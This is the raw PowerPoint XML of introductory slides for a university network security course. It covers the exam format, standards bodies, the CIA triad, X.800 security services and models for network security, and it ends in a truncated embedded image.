            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Computer Security</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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Standards Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>National Institute of Standards &amp; Technology (NIST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Internet Society (ISOC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>International Telecommunication Union Telecommunication Standardization Sector (ITU-T)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>International Organization for Standardization (ISO)</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err="1" smtClean="0"/>
              <a:t>ExaM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> procedure</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Talk on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>selected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>topic</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>The talk must include a live demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Oral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Chapter 1 – Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="2133600"/>
            <a:ext cx="8229600" cy="3989388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0"/>
              <a:t>The combination of space, time, and strength that must be considered as the basic elements of this theory of defense makes this a fairly complicated matter. Consequently, it is not easy to find a fixed point of departure.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" i="1" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" smtClean="0"/>
              <a:t>	— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" i="1" smtClean="0"/>
              <a:t>On War, Carl Von Clausewitz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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smtClean="0"/>
              <a:t>Computer Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>the protection afforded to an automated information system in order to attain the applicable objectives of preserving the integrity, availability and confidentiality of information system resources (includes hardware, software, firmware, information/data, and telecommunications)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Levels of Impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>can define 3 levels of impact from a security breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Moderate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>High</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ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Examples of Security Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>confidentiality – student grades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>integrity – patient information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>availability – authentication service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813"/>
            <a:ext cx="8534400" cy="1139825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">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381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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OSI Security Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8382000" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>ITU-T X.800 “Security Architecture for OSI”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>defines a systematic way of defining and providing security requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>for us it provides a useful, if abstract, overview of concepts we will study</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77828"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648200"/>
            <a:ext cx="3446463" cy="19272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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>X.800:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>“a service provided by a protocol layer of communicating open systems, which ensures adequate security of the systems or of data transfers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>RFC 2828:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>“a processing or communication service provided by a system to give a specific kind of protection to system resources”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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Model for Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923"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smtClean="0">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design a suitable algorithm for the security transformation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generate the secret information (keys) used by the algorithm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develop methods to distribute and share the secret information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specify a protocol enabling the principals to use the transformation and secret information for a security service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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Model for Network Access Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971"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smtClean="0">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select appropriate gatekeeper functions to identify users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>implement security controls to ensure only authorised users access designated information or resources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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>topic roadmap &amp; standards organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>security concepts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>confidentiality, integrity, availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>X.800 security architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>security attacks, services, mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>models for network (access) security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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Course </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>PrograM</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Part 1: Cryptography on the field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2400" smtClean="0"/>
              <a:t>Hashing, Asymmetric and Symmetric Cryptography, PKI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Part 2: a travel into the security of the TCP/IP stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Part 3: Host security. Programming security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="it-IT" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2800" smtClean="0"/>
              <a:t>Laboratory: Linux, simulations with Netkit, OWASP, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Immagin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27675" y="5500688"/>
            <a:ext cx="344963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Immagin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5005388"/>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Immagin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5233988"/>
            <a:ext cx="11509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NERD THING of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="AutoShape 6" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBxQTERUQEhAWFBAWGBYVFxUUFhIWFxcaFRYWGR0ZFhkcISghGB4lGxQZITEiJyk3Ly4uGiAzODMsNygtMCwBCgoKDg0OGhAQFiwcHiUxNzQ3Liw3Nzc0MywrNzQrNzc1Nys3NCwsLTE3LDg2MCwsLCssLys3NDQrKywsNC04LP/AABEIAJ0BQAMBIgACEQEDEQH/xAAcAAEAAgMBAQEAAAAAAAAAAAAABAUDBggBAgf/xABHEAABBAADAgUODgICAgMAAAABAAIDEQQSISIxBQYTMkEUFSMzUVJTVGFjkaLT4QcWNDVicXJzgZKUsbKzJEJDk6HBg8PS/8QAGgEBAQEBAQEBAAAAAAAAAAAAAAECAwUGBP/EAC4RAQAABAUCAwcFAAAAAAAAAAABAgOhBBEVIVIU0RIxUwUzQWGSorEicXKCkf/aAAwDAQACEQMRAD8A1svFkumY3smSnzZDtXRrKaHRfkd3qycWqxErGOMjWvD6yvGZuVpdqaIPNrd0+mBwhjsC2V7H4iXO1zmn/FadWuINHldRaxM4XwI3YqYfVhWj/wC5fSy4+l4pozV9ow2hlHazx44afwwyp7/HfzbfBxXkc0HlqMjI5IxmcaEj4hUhrWmyjUDeCkvFaVjc78Q3KWyubl5Qk8nFLINNKsQnyix3VqQ4bwXjc/6Ye2XvXzBeNz/ph9Xhu4rqFPP3/wBsU6Wf07tnwHF98sTJm4gNaWue7PylMDXSjeAdMsLjZrUgdIUrEcT8QxrnOnjtrXPLQ95NNGu4abVt+tpWndfMDu6rnrudTD2y96+4Lxuf9MOn/wCZWPtCnntXhl/GKQws+W9O7bfi88yYmJsjxyWsZfmAeA4gkkDdsnUaA71Kk4quzAMnOWrOcus880KFDSN2/TctJ6/YLxufufJhu7nbl71/wXjc/wCmHtliOOp57V8v6xWGFn9O7c8XxRma4gTty8q2JpLn2c8jGA2BRrlG3XSHje1e4biu97Nme5DtA28NLcsDwaq7yzbtNaWmDjDgvG5/0w+vwyyYfjPg2OD2YucOG7/Gad4rcZaOmikcfLltXh9MSGFmz93dtbuLxDb6p1DZS4DO63RnGZcmmrXDBu8uu7ULF1gm6oOHMlUC7lOyZDTWuoaWTTh6VreI404R7zI/GYhz3GyThh7XyrH8Y8F41P8Apx7Vbh7Qp/Gt9sfP/EjhZ/TuvuGMG6B7WF7iSxrnamsxLgQPJbVC5V3fH0lVx4xYHxmf9MPap8YsD4xN+mb7Vd5PaeGhDKM+cf2i5zYOtGO0t1kJXd8fSV9CR3fH0lVnxjwPjE36ZvtV78ZMD4xN+mb7VXVMJytHsnRV+N1mJD3x9JX1yh74+kqr+MuA8Ym/TN9qvfjNgPGJv07fapqeE5Wj2Oir8brQSHvj6SveUPfH0lVXxnwHjE36dvtV78Z8B4eb9O32qmp4XlaPY6KvxuthIe+PpK9Eh74+kqp+NGA8PN+nb7VPjTgPDzfp2+1U1PC8rR7HRV+N1wJD3x9JX0JD3x9JVN8asB4eb9O32q9+NeA8PN+nb7VNSwvK0ex0Vfjdc8oe+PpK9Eh74+kqm+NmA8PN+nb7Re/GzAeHm/Tt9opqWF5Wj2Oir8broSHvj6SvRIe+PpKpPjbgPDTfp2+0XvxuwHhpv07faJqWF5Wj2Oir8brwSHun0leiQ90+kqj+N+A8NN+nb7Re/HDAeGn/AE7faKalheVonRV+N17yh7p9JXoee6fSVQ/HHAeGn/6G+0XvxywHhp/+hvtFNSwvK0Toq/G6/